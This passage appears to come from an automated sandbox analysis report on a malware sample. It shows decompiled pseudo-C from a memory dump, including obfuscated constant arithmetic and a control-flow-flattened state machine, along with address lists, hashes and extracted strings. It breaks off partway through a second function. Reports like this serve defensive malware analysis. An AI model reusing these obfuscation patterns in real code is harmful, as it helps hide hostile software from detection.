                                                                                                                                                                                                                    • Opcode ID: 73bd45c3e6aeea141d443e93a692042fd51c011e2f121652ec3bd7a3ded41b58
                                                                                                                                                                                                                    • Instruction ID: 2d4a29c0749ac110dcabc46c13d3d73c7aa4abab23a6d3c5c5dcf1d59991899e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73bd45c3e6aeea141d443e93a692042fd51c011e2f121652ec3bd7a3ded41b58
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52C14571A083809FC768CF65C48981BBBF1FBD4398F20891DF6968A260D7B5D9498F43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A62D46() {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				signed int _v524;
                                                                                                                                                                                                                    				signed int _v528;
                                                                                                                                                                                                                    				signed int _v532;
                                                                                                                                                                                                                    				signed int _v536;
                                                                                                                                                                                                                    				signed int _v540;
                                                                                                                                                                                                                    				signed int _v544;
                                                                                                                                                                                                                    				signed int _v548;
                                                                                                                                                                                                                    				signed int _v552;
                                                                                                                                                                                                                    				signed int _v556;
                                                                                                                                                                                                                    				signed int _v560;
                                                                                                                                                                                                                    				signed int _v564;
                                                                                                                                                                                                                    				signed int _v568;
                                                                                                                                                                                                                    				signed int _v572;
                                                                                                                                                                                                                    				signed int _v576;
                                                                                                                                                                                                                    				signed int _v580;
                                                                                                                                                                                                                    				unsigned int _v584;
                                                                                                                                                                                                                    				signed int _v588;
                                                                                                                                                                                                                    				signed int _v592;
                                                                                                                                                                                                                    				signed int _v596;
                                                                                                                                                                                                                    				signed int _v600;
                                                                                                                                                                                                                    				signed int _v604;
                                                                                                                                                                                                                    				signed int _v608;
                                                                                                                                                                                                                    				signed int _v612;
                                                                                                                                                                                                                    				signed int _v616;
                                                                                                                                                                                                                    				signed int _t239;
                                                                                                                                                                                                                    				void* _t243;
                                                                                                                                                                                                                    				void* _t246;
                                                                                                                                                                                                                    				signed int _t267;
                                                                                                                                                                                                                    				signed int _t268;
                                                                                                                                                                                                                    				void* _t270;
                                                                                                                                                                                                                    				signed int* _t272;
                                                                                                                                                                                                                    				void* _t275;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t272 =  &_v616;
                                                                                                                                                                                                                    				_v532 = 0x14d0ed;
                                                                                                                                                                                                                    				_v532 = _v532 + 0xffffb97a;
                                                                                                                                                                                                                    				_t246 = 0x960082b;
                                                                                                                                                                                                                    				_v532 = _v532 ^ 0x00148a7b;
                                                                                                                                                                                                                    				_v568 = 0x33423e;
                                                                                                                                                                                                                    				_t7 =  &_v568; // 0x33423e
                                                                                                                                                                                                                    				_v568 =  *_t7 * 0x44;
                                                                                                                                                                                                                    				_t270 = 0;
                                                                                                                                                                                                                    				_v568 = _v568 + 0xffff1133;
                                                                                                                                                                                                                    				_v568 = _v568 ^ 0x0d9ca982;
                                                                                                                                                                                                                    				_v608 = 0x1fe551;
                                                                                                                                                                                                                    				_t267 = 0x7d;
                                                                                                                                                                                                                    				_v608 = _v608 * 0x1a;
                                                                                                                                                                                                                    				_v608 = _v608 * 0x75;
                                                                                                                                                                                                                    				_v608 = _v608 * 0x14;
                                                                                                                                                                                                                    				_v608 = _v608 ^ 0x9c357a17;
                                                                                                                                                                                                                    				_v548 = 0xd4c26;
                                                                                                                                                                                                                    				_v548 = _v548 ^ 0xc925cf86;
                                                                                                                                                                                                                    				_v548 = _v548 << 5;
                                                                                                                                                                                                                    				_v548 = _v548 ^ 0x251cac16;
                                                                                                                                                                                                                    				_v584 = 0x3f3410;
                                                                                                                                                                                                                    				_v584 = _v584 + 0xffff9296;
                                                                                                                                                                                                                    				_v584 = _v584 << 0xe;
                                                                                                                                                                                                                    				_v584 = _v584 >> 8;
                                                                                                                                                                                                                    				_v584 = _v584 ^ 0x00b311f2;
                                                                                                                                                                                                                    				_v576 = 0xc76bfc;
                                                                                                                                                                                                                    				_v576 = _v576 >> 2;
                                                                                                                                                                                                                    				_v576 = _v576 * 0x41;
                                                                                                                                                                                                                    				_v576 = _v576 + 0xffffe1aa;
                                                                                                                                                                                                                    				_v576 = _v576 ^ 0x0caa7c95;
                                                                                                                                                                                                                    				_v540 = 0xd68d2e;
                                                                                                                                                                                                                    				_v540 = _v540 + 0x94a1;
                                                                                                                                                                                                                    				_v540 = _v540 ^ 0x00df3166;
                                                                                                                                                                                                                    				_v592 = 0x4cbf0f;
                                                                                                                                                                                                                    				_v592 = _v592 / _t267;
                                                                                                                                                                                                                    				_v592 = _v592 >> 4;
                                                                                                                                                                                                                    				_v592 = _v592 << 0xb;
                                                                                                                                                                                                                    				_v592 = _v592 ^ 0x0040b8d3;
                                                                                                                                                                                                                    				_v612 = 0x51b4cb;
                                                                                                                                                                                                                    				_v612 = _v612 << 0x10;
                                                                                                                                                                                                                    				_v612 = _v612 + 0xffff667c;
                                                                                                                                                                                                                    				_v612 = _v612 * 0x2e;
                                                                                                                                                                                                                    				_v612 = _v612 ^ 0x7c5a8707;
                                                                                                                                                                                                                    				_v616 = 0xeff699;
                                                                                                                                                                                                                    				_v616 = _v616 ^ 0x5891ab8d;
                                                                                                                                                                                                                    				_v616 = _v616 >> 7;
                                                                                                                                                                                                                    				_v616 = _v616 + 0xd933;
                                                                                                                                                                                                                    				_v616 = _v616 ^ 0x00b8707d;
                                                                                                                                                                                                                    				_v560 = 0xb5899c;
                                                                                                                                                                                                                    				_v560 = _v560 >> 0xe;
                                                                                                                                                                                                                    				_v560 = _v560 ^ 0x7b466441;
                                                                                                                                                                                                                    				_v560 = _v560 ^ 0x7b497c0b;
                                                                                                                                                                                                                    				_v528 = 0x800d72;
                                                                                                                                                                                                                    				_v528 = _v528 << 6;
                                                                                                                                                                                                                    				_v528 = _v528 ^ 0x2000e633;
                                                                                                                                                                                                                    				_v600 = 0x5b9fa9;
                                                                                                                                                                                                                    				_v600 = _v600 + 0xc6;
                                                                                                                                                                                                                    				_v600 = _v600 + 0xd69a;
                                                                                                                                                                                                                    				_v600 = _v600 * 0x32;
                                                                                                                                                                                                                    				_v600 = _v600 ^ 0x12060185;
                                                                                                                                                                                                                    				_v556 = 0xa993d2;
                                                                                                                                                                                                                    				_v556 = _v556 | 0x7a5feaf3;
                                                                                                                                                                                                                    				_v556 = _v556 ^ 0x7af0ab40;
                                                                                                                                                                                                                    				_v544 = 0xf1d15e;
                                                                                                                                                                                                                    				_v544 = _v544 | 0xbaa43eda;
                                                                                                                                                                                                                    				_v544 = _v544 * 0x7f;
                                                                                                                                                                                                                    				_v544 = _v544 ^ 0xc00bd7dc;
                                                                                                                                                                                                                    				_v552 = 0x48af41;
                                                                                                                                                                                                                    				_v552 = _v552 >> 3;
                                                                                                                                                                                                                    				_v552 = _v552 << 8;
                                                                                                                                                                                                                    				_v552 = _v552 ^ 0x091c5d89;
                                                                                                                                                                                                                    				_v588 = 0x78b097;
                                                                                                                                                                                                                    				_v588 = _v588 + 0x9547;
                                                                                                                                                                                                                    				_v588 = _v588 ^ 0x5c8b7e9c;
                                                                                                                                                                                                                    				_v588 = _v588 ^ 0x2e51dbb4;
                                                                                                                                                                                                                    				_v588 = _v588 ^ 0x72ad0229;
                                                                                                                                                                                                                    				_v596 = 0xb1f71;
                                                                                                                                                                                                                    				_t268 = 0xb;
                                                                                                                                                                                                                    				_v596 = _v596 * 0x39;
                                                                                                                                                                                                                    				_v596 = _v596 * 0x55;
                                                                                                                                                                                                                    				_v596 = _v596 << 7;
                                                                                                                                                                                                                    				_v596 = _v596 ^ 0x4101a8d2;
                                                                                                                                                                                                                    				_v604 = 0xc201d7;
                                                                                                                                                                                                                    				_v604 = _v604 >> 2;
                                                                                                                                                                                                                    				_v604 = _v604 >> 0x10;
                                                                                                                                                                                                                    				_v604 = _v604 >> 4;
                                                                                                                                                                                                                    				_v604 = _v604 ^ 0x000fbb9b;
                                                                                                                                                                                                                    				_v564 = 0x2a3f72;
                                                                                                                                                                                                                    				_v564 = _v564 ^ 0xf333dc7f;
                                                                                                                                                                                                                    				_v564 = _v564 + 0x1f1;
                                                                                                                                                                                                                    				_v564 = _v564 ^ 0xf31d8f79;
                                                                                                                                                                                                                    				_v536 = 0xdd6021;
                                                                                                                                                                                                                    				_v536 = _v536 << 7;
                                                                                                                                                                                                                    				_v536 = _v536 ^ 0x6eb7e4d2;
                                                                                                                                                                                                                    				_v572 = 0x46270f;
                                                                                                                                                                                                                    				_t269 = _v524;
                                                                                                                                                                                                                    				_v572 = _v572 / _t268;
                                                                                                                                                                                                                    				_v572 = _v572 ^ 0x0e821fef;
                                                                                                                                                                                                                    				_v572 = _v572 | 0x9f09af30;
                                                                                                                                                                                                                    				_v572 = _v572 ^ 0x9f88e07c;
                                                                                                                                                                                                                    				_v580 = 0x38f37a;
                                                                                                                                                                                                                    				_v580 = _v580 | 0x777cf6f5;
                                                                                                                                                                                                                    				_v580 = _v580 + 0x3c10;
                                                                                                                                                                                                                    				_v580 = _v580 ^ 0x777d82e5;
                                                                                                                                                                                                                    				goto L1;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L1:
                                                                                                                                                                                                                    						_t275 = _t246 - 0x7631e43;
                                                                                                                                                                                                                    						if(_t275 > 0) {
                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t275 == 0) {
                                                                                                                                                                                                                    							E00A74BDA();
                                                                                                                                                                                                                    							_t246 = 0x4b18e6f;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t246 == 0xd381a8) {
                                                                                                                                                                                                                    							_t246 = 0x7923ce4;
                                                                                                                                                                                                                    							_v524 = _v568;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t246 == 0x1b07cd1) {
                                                                                                                                                                                                                    							_t246 = 0xcc07c41;
                                                                                                                                                                                                                    							_v524 = _v532;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t246 == 0x4b18e6f) {
                                                                                                                                                                                                                    							E00A6D804(_v552, _v588,  &_v520, _t246, _v596, _v604);
                                                                                                                                                                                                                    							 *((intOrPtr*)( *0xa83b38 + 0x428)) = E00A7AAF3(_v536,  &_v520, _v572, _v580);
                                                                                                                                                                                                                    							L22:
                                                                                                                                                                                                                    							return _t270;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t246 != 0x6f3c8b6) {
                                                                                                                                                                                                                    							goto L19;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t239 = E00A769E0(_v576, _v608, _t246, _v540, _t246, _v592);
                                                                                                                                                                                                                    						_t269 = _t239;
                                                                                                                                                                                                                    						_t272 =  &(_t272[4]);
                                                                                                                                                                                                                    						if(_t239 == 0) {
                                                                                                                                                                                                                    							_t246 = 0x1b07cd1;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							 *((intOrPtr*)( *0xa83b38 + 0x214)) = 1;
                                                                                                                                                                                                                    							_t246 = 0xd381a8;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t246 == 0x7923ce4) {
                                                                                                                                                                                                                    						E00A7286C(_v612, _t269, _v616, _v560);
                                                                                                                                                                                                                    						_t246 = 0xcc07c41;
                                                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t246 == 0x960082b) {
                                                                                                                                                                                                                    						 *0xa83b38 = E00A7C6D9(0x430);
                                                                                                                                                                                                                    						_t246 = 0x6f3c8b6;
                                                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t246 != 0xcc07c41) {
                                                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					E00A7E4D8(_v528, _v600, _t246, _t246, _v556, _t246, _v524,  *0xa83b38 + 0x21c, _v544);
                                                                                                                                                                                                                    					_t272 =  &(_t272[7]);
                                                                                                                                                                                                                    					_t246 = 0x7631e43;
                                                                                                                                                                                                                    					_t243 = 1;
                                                                                                                                                                                                                    					_t270 =  ==  ? _t243 : _t270;
                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                                    				} while (_t246 != 0xa138c88);
                                                                                                                                                                                                                    				goto L22;
                                                                                                                                                                                                                    			}




































                                                                                                                                                                                                                    0x00a62d46
                                                                                                                                                                                                                    0x00a62d4c
                                                                                                                                                                                                                    0x00a62d56
                                                                                                                                                                                                                    0x00a62d5e
                                                                                                                                                                                                                    0x00a62d63
                                                                                                                                                                                                                    0x00a62d6b
                                                                                                                                                                                                                    0x00a62d73
                                                                                                                                                                                                                    0x00a62d7c
                                                                                                                                                                                                                    0x00a62d80
                                                                                                                                                                                                                    0x00a62d82
                                                                                                                                                                                                                    0x00a62d8a
                                                                                                                                                                                                                    0x00a62d92
                                                                                                                                                                                                                    0x00a62da1
                                                                                                                                                                                                                    0x00a62da2
                                                                                                                                                                                                                    0x00a62dab
                                                                                                                                                                                                                    0x00a62db4
                                                                                                                                                                                                                    0x00a62db8
                                                                                                                                                                                                                    0x00a62dc0
                                                                                                                                                                                                                    0x00a62dc8
                                                                                                                                                                                                                    0x00a62dd0
                                                                                                                                                                                                                    0x00a62dd5
                                                                                                                                                                                                                    0x00a62ddd
                                                                                                                                                                                                                    0x00a62de5
                                                                                                                                                                                                                    0x00a62ded
                                                                                                                                                                                                                    0x00a62df2
                                                                                                                                                                                                                    0x00a62df7
                                                                                                                                                                                                                    0x00a62dff
                                                                                                                                                                                                                    0x00a62e07
                                                                                                                                                                                                                    0x00a62e11
                                                                                                                                                                                                                    0x00a62e15
                                                                                                                                                                                                                    0x00a62e1d
                                                                                                                                                                                                                    0x00a62e25
                                                                                                                                                                                                                    0x00a62e2d
                                                                                                                                                                                                                    0x00a62e35
                                                                                                                                                                                                                    0x00a62e3d
                                                                                                                                                                                                                    0x00a62e4b
                                                                                                                                                                                                                    0x00a62e4f
                                                                                                                                                                                                                    0x00a62e54
                                                                                                                                                                                                                    0x00a62e59
                                                                                                                                                                                                                    0x00a62e61
                                                                                                                                                                                                                    0x00a62e69
                                                                                                                                                                                                                    0x00a62e6e
                                                                                                                                                                                                                    0x00a62e7b
                                                                                                                                                                                                                    0x00a62e7f
                                                                                                                                                                                                                    0x00a62e87
                                                                                                                                                                                                                    0x00a62e8f
                                                                                                                                                                                                                    0x00a62e97
                                                                                                                                                                                                                    0x00a62e9c
                                                                                                                                                                                                                    0x00a62ea4
                                                                                                                                                                                                                    0x00a62eac
                                                                                                                                                                                                                    0x00a62eb4
                                                                                                                                                                                                                    0x00a62eb9
                                                                                                                                                                                                                    0x00a62ec1
                                                                                                                                                                                                                    0x00a62ec9
                                                                                                                                                                                                                    0x00a62ed1
                                                                                                                                                                                                                    0x00a62ed6
                                                                                                                                                                                                                    0x00a62ede
                                                                                                                                                                                                                    0x00a62ee6
                                                                                                                                                                                                                    0x00a62eee
                                                                                                                                                                                                                    0x00a62efb
                                                                                                                                                                                                                    0x00a62eff
                                                                                                                                                                                                                    0x00a62f07
                                                                                                                                                                                                                    0x00a62f0f
                                                                                                                                                                                                                    0x00a62f17
                                                                                                                                                                                                                    0x00a62f1f
                                                                                                                                                                                                                    0x00a62f27
                                                                                                                                                                                                                    0x00a62f34
                                                                                                                                                                                                                    0x00a62f38
                                                                                                                                                                                                                    0x00a62f42
                                                                                                                                                                                                                    0x00a62f4f
                                                                                                                                                                                                                    0x00a62f59
                                                                                                                                                                                                                    0x00a62f5e
                                                                                                                                                                                                                    0x00a62f66
                                                                                                                                                                                                                    0x00a62f6e
                                                                                                                                                                                                                    0x00a62f76
                                                                                                                                                                                                                    0x00a62f7e
                                                                                                                                                                                                                    0x00a62f86
                                                                                                                                                                                                                    0x00a62f8e
                                                                                                                                                                                                                    0x00a62f9d
                                                                                                                                                                                                                    0x00a62f9e
                                                                                                                                                                                                                    0x00a62fa7
                                                                                                                                                                                                                    0x00a62fab
                                                                                                                                                                                                                    0x00a62fb0
                                                                                                                                                                                                                    0x00a62fb8
                                                                                                                                                                                                                    0x00a62fc0
                                                                                                                                                                                                                    0x00a62fc5
                                                                                                                                                                                                                    0x00a62fca
                                                                                                                                                                                                                    0x00a62fcf
                                                                                                                                                                                                                    0x00a62fd7
                                                                                                                                                                                                                    0x00a62fdf
                                                                                                                                                                                                                    0x00a62fe7
                                                                                                                                                                                                                    0x00a62fef
                                                                                                                                                                                                                    0x00a62ff7
                                                                                                                                                                                                                    0x00a62fff
                                                                                                                                                                                                                    0x00a63004
                                                                                                                                                                                                                    0x00a6300c
                                                                                                                                                                                                                    0x00a6301a
                                                                                                                                                                                                                    0x00a6301e
                                                                                                                                                                                                                    0x00a63022
                                                                                                                                                                                                                    0x00a6302a
                                                                                                                                                                                                                    0x00a63032
                                                                                                                                                                                                                    0x00a6303a
                                                                                                                                                                                                                    0x00a63042
                                                                                                                                                                                                                    0x00a6304a
                                                                                                                                                                                                                    0x00a63052
                                                                                                                                                                                                                    0x00a63052
                                                                                                                                                                                                                    0x00a6305a
                                                                                                                                                                                                                    0x00a6305a
                                                                                                                                                                                                                    0x00a6305a
                                                                                                                                                                                                                    0x00a6305a
                                                                                                                                                                                                                    0x00a6305c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a63062
                                                                                                                                                                                                                    0x00a630ea
                                                                                                                                                                                                                    0x00a630ef
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a630ef
                                                                                                                                                                                                                    0x00a6306e
                                                                                                                                                                                                                    0x00a630dc
                                                                                                                                                                                                                    0x00a630e1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a630e1
                                                                                                                                                                                                                    0x00a63076
                                                                                                                                                                                                                    0x00a630d0
                                                                                                                                                                                                                    0x00a630d2
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a630d2
                                                                                                                                                                                                                    0x00a6307e
                                                                                                                                                                                                                    0x00a631a6
                                                                                                                                                                                                                    0x00a631d1
                                                                                                                                                                                                                    0x00a631d8
                                                                                                                                                                                                                    0x00a631e3
                                                                                                                                                                                                                    0x00a631e3
                                                                                                                                                                                                                    0x00a6308a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a630a2
                                                                                                                                                                                                                    0x00a630a7
                                                                                                                                                                                                                    0x00a630a9
                                                                                                                                                                                                                    0x00a630ae
                                                                                                                                                                                                                    0x00a630c5
                                                                                                                                                                                                                    0x00a630b0
                                                                                                                                                                                                                    0x00a630b8
                                                                                                                                                                                                                    0x00a630be
                                                                                                                                                                                                                    0x00a630be
                                                                                                                                                                                                                    0x00a630ae
                                                                                                                                                                                                                    0x00a630ff
                                                                                                                                                                                                                    0x00a63179
                                                                                                                                                                                                                    0x00a63180
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a63180
                                                                                                                                                                                                                    0x00a63107
                                                                                                                                                                                                                    0x00a6315c
                                                                                                                                                                                                                    0x00a63161
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a63161
                                                                                                                                                                                                                    0x00a6310b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a63132
                                                                                                                                                                                                                    0x00a63137
                                                                                                                                                                                                                    0x00a6313a
                                                                                                                                                                                                                    0x00a63140
                                                                                                                                                                                                                    0x00a63141
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a63182
                                                                                                                                                                                                                    0x00a63182
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: &L$3$>B3$AdF{$r?*
                                                                                                                                                                                                                    • API String ID: 0-94126725
                                                                                                                                                                                                                    • Opcode ID: 100cfd2a43c33e76bfabf68a563027c96afc6594acdb03a4a20dad7b7846838e
                                                                                                                                                                                                                    • Instruction ID: 41b94b6f87a2fec4e6bca2679f36b85ca27bb5b8d779749737b1176c2b68cb29
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 100cfd2a43c33e76bfabf68a563027c96afc6594acdb03a4a20dad7b7846838e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99C10FB21083819FC758CF65C58A41BFBF1FB84758F208A1DF29696260D7B5CA4ACF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                    			E00A7D88A() {
                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				unsigned int _v124;
                                                                                                                                                                                                                    				signed int _t227;
                                                                                                                                                                                                                    				intOrPtr _t231;
                                                                                                                                                                                                                    				intOrPtr _t234;
                                                                                                                                                                                                                    				void* _t235;
                                                                                                                                                                                                                    				signed int _t237;
                                                                                                                                                                                                                    				signed int _t238;
                                                                                                                                                                                                                    				signed int _t239;
                                                                                                                                                                                                                    				signed int _t240;
                                                                                                                                                                                                                    				void* _t265;
                                                                                                                                                                                                                    				char _t269;
                                                                                                                                                                                                                    				unsigned int* _t270;
                                                                                                                                                                                                                    				void* _t272;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t270 =  &_v124;
                                                                                                                                                                                                                    				_v20 = 0xa0c1c5;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_t235 = 0;
                                                                                                                                                                                                                    				_t237 = 0x2d;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_t265 = 0x1f1b32e;
                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                    				_v124 = 0x75b31b;
                                                                                                                                                                                                                    				_v124 = _v124 >> 3;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x759506f9;
                                                                                                                                                                                                                    				_v124 = _v124 >> 8;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0x007671e4;
                                                                                                                                                                                                                    				_v56 = 0x7f658;
                                                                                                                                                                                                                    				_v56 = _v56 * 0x5e;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x02e2dfe3;
                                                                                                                                                                                                                    				_v116 = 0x55dbaf;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x947f23b0;
                                                                                                                                                                                                                    				_v116 = _v116 * 0x7f;
                                                                                                                                                                                                                    				_v116 = _v116 / _t237;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x02d2f9b0;
                                                                                                                                                                                                                    				_v92 = 0x3838d3;
                                                                                                                                                                                                                    				_v92 = _v92 << 0xd;
                                                                                                                                                                                                                    				_t238 = 0x35;
                                                                                                                                                                                                                    				_v92 = _v92 * 0x4d;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0x22ea0959;
                                                                                                                                                                                                                    				_v120 = 0x4b9831;
                                                                                                                                                                                                                    				_v120 = _v120 + 0xd8e8;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x2417613e;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x40b5831a;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x64e3813e;
                                                                                                                                                                                                                    				_v104 = 0x896590;
                                                                                                                                                                                                                    				_v104 = _v104 >> 4;
                                                                                                                                                                                                                    				_v104 = _v104 << 0x10;
                                                                                                                                                                                                                    				_v104 = _v104 | 0x17f59c07;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x97f9c664;
                                                                                                                                                                                                                    				_v48 = 0x34da7e;
                                                                                                                                                                                                                    				_v48 = _v48 >> 9;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x000a8399;
                                                                                                                                                                                                                    				_v80 = 0x4f9424;
                                                                                                                                                                                                                    				_v80 = _v80 << 0xf;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0xb4d4de46;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x7ec7aaa4;
                                                                                                                                                                                                                    				_v84 = 0x622d93;
                                                                                                                                                                                                                    				_v84 = _v84 + 0xffffc840;
                                                                                                                                                                                                                    				_v84 = _v84 * 0x4b;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x1cb0a3e2;
                                                                                                                                                                                                                    				_v72 = 0xf33a86;
                                                                                                                                                                                                                    				_v72 = _v72 | 0xc672f4c0;
                                                                                                                                                                                                                    				_v72 = _v72 + 0xd494;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0xc6f952dc;
                                                                                                                                                                                                                    				_v76 = 0xd9905a;
                                                                                                                                                                                                                    				_v76 = _v76 | 0x55c3aae1;
                                                                                                                                                                                                                    				_v76 = _v76 + 0xffff1663;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x55d1a9b2;
                                                                                                                                                                                                                    				_v68 = 0x5bfcdb;
                                                                                                                                                                                                                    				_v68 = _v68 / _t238;
                                                                                                                                                                                                                    				_v68 = _v68 << 0xb;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x0de5e4e1;
                                                                                                                                                                                                                    				_v96 = 0xc3ef25;
                                                                                                                                                                                                                    				_v96 = _v96 >> 0xa;
                                                                                                                                                                                                                    				_v96 = _v96 >> 0xb;
                                                                                                                                                                                                                    				_t239 = 0x3d;
                                                                                                                                                                                                                    				_v96 = _v96 / _t239;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x000f883b;
                                                                                                                                                                                                                    				_v100 = 0x3f749a;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0xde0b6ed3;
                                                                                                                                                                                                                    				_v100 = _v100 + 0xffff8618;
                                                                                                                                                                                                                    				_t240 = 0x58;
                                                                                                                                                                                                                    				_v100 = _v100 * 0x1a;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x91353c39;
                                                                                                                                                                                                                    				_v108 = 0x7ef72b;
                                                                                                                                                                                                                    				_v108 = _v108 | 0xe85441bd;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x588153b3;
                                                                                                                                                                                                                    				_v108 = _v108 | 0xdd9a10c3;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0xfdf74fe9;
                                                                                                                                                                                                                    				_v112 = 0x9e9f37;
                                                                                                                                                                                                                    				_v112 = _v112 | 0x33ae0080;
                                                                                                                                                                                                                    				_v112 = _v112 * 0x7b;
                                                                                                                                                                                                                    				_v112 = _v112 + 0x2642;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0xdc90b92f;
                                                                                                                                                                                                                    				_v88 = 0x55ba8d;
                                                                                                                                                                                                                    				_v88 = _v88 / _t240;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x0f2361e0;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x0f2488ee;
                                                                                                                                                                                                                    				_v52 = 0xb052bb;
                                                                                                                                                                                                                    				_v52 = _v52 * 0x46;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x303d5d59;
                                                                                                                                                                                                                    				_v60 = 0x2aae6e;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0xfaa0b6fe;
                                                                                                                                                                                                                    				_v60 = _v60 + 0xf65c;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0xfa88fb3f;
                                                                                                                                                                                                                    				_v64 = 0x4ef1f;
                                                                                                                                                                                                                    				_v64 = _v64 * 0x5c;
                                                                                                                                                                                                                    				_v64 = _v64 << 0xf;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0xf79aacbe;
                                                                                                                                                                                                                    				_t264 = _v44;
                                                                                                                                                                                                                    				_t269 = _v44;
                                                                                                                                                                                                                    				goto L1;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L1:
                                                                                                                                                                                                                    						_t272 = _t265 - 0x73ef4cc;
                                                                                                                                                                                                                    						if(_t272 > 0) {
                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t272 == 0) {
